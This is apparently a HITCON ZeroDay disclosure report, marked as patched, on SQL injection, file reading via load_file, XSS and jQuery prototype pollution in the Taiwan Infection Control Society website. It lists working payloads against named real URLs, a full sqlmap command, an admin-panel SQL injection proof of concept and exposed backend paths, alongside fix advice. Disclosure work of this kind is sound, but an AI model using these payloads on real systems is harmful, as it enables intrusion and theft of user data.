Vulnerability Overview

ZDID: ZD-2022-00638
發信 Vendor: 社團法人台灣感染管制學會
Title: 社團法人台灣感染管制學會網站存在 SQL injection to LFI 與 XSS to 原型汙染
Introduction: 網站存在 SQL injection to LFI 與 XSS to 原型汙染

處理狀態

目前狀態

公開

Last Update : 2022/10/12

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2022/08/09 03:45:29 : 新提交 (由 BTtea 更新此狀態)
2022/08/09 03:47:42 : 新提交 (由 BTtea 更新此狀態)
2022/08/09 03:49:27 : 新提交 (由 BTtea 更新此狀態)
2022/08/09 03:59:08 : 新提交 (由 BTtea 更新此狀態)
2022/08/09 15:41:16 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/08/11 21:23:18 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/08/11 21:23:18 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/08/11 21:23:18 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/04 18:26:18 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/12 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2022-00638
通報者：blacktea_player (BTtea)
風險：高
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

使用工具 SQLmap 輔助測試 (以下若使用SQLmap工具進行注入時有中斷問題，請去除 --batch 參數後進行注入，遇到詢問連線異常是否繼續測試的訊息請選擇 y )

原型汙染成因為 jquery 版本過低所導致

https://nics.org.tw/news_detail.php?id=1005&ipage=0
GET 參數 ipage 存在 XSS to 原型汙染

xss payload : "><img src=1 onerror=alert(document.cookie)>
xss to 原型汙染 payload : "><img src=1 onerror=$.extend(true,{},JSON.parse('{"__proto__":{"z":123'));alert(z);>

https://nics.org.tw/member_login.php
post : logUrl=mem_login&loginid=admin&loginpw=123456&button=我要登入
POST 參數 logUrl 存在 XSS

xss payload : ";alert(document.cookie);//

https://nics.org.tw/magazine.php?ipage=169&searchkeyword=1&Maguid=1||1&Magsuid=3||&Maguid2=211||31&Magsuid2=218||
GET 參數 searchkeyword , Maguid , Magsuid , Maguid2 , Magsuid2 存在 XSS

xss payload : "><img src=1 onerror=alert(document.cookie)>

並且 GET 參數 Magsuid , Magsuid2 存在 SQL injection

GET 參數 Magsuid2 可導致 SQL injection to LFI
load_file() 內原始內容為 C:\windows\win.ini
```
https://nics.org.tw/magazine.php?ipage=169&searchkeyword=1&Maguid=1||1&Magsuid=3||&Maguid2=211||31&Magsuid2=218||)%20and%200%20union%20select%201,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,5,6,7,8,9,10,11,12,13--%20-
```
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://nics.org.tw/magazine.php?Maguid=1||1&Magsuid=3||3&Maguid2=211||31&Magsuid2=218||5&searchkeyword=123" --dbs --batch --tamper space2mssqlhash -p Magsuid2
( -p 參數可換 )

無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
https://nics.org.tw/.DS_Store (6KB)
https://nics.org.tw/head.html ( 後台操作教學，此處洩漏了後台網站位址 )
https://nics.org.tw/index.php/login/
https://nics.org.tw/system/ (會被轉址)

system 底下
https://nics.org.tw/system/help/
https://nics.org.tw/system/sys.php (後台位址)

修補建議

測試過程中發現 SQL 權限設置過大，具有寫檔與讀檔權限，建議降低權限

升級 jquery 至最新版本

後台的各個 POST 或者 GET 等等搜尋欄位參數皆存在 SQL injection
建議修復
PoC :
登陸後台後連接此網址
https://nics.org.tw/system/talk/talk_list.php?searchkey=%27%20and%200%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

社團法人台灣感染管制學會網站存在 SQL injection to LFI 與 XSS to 原型汙染 - HITCON ZeroDay

Vulnerability Detail Report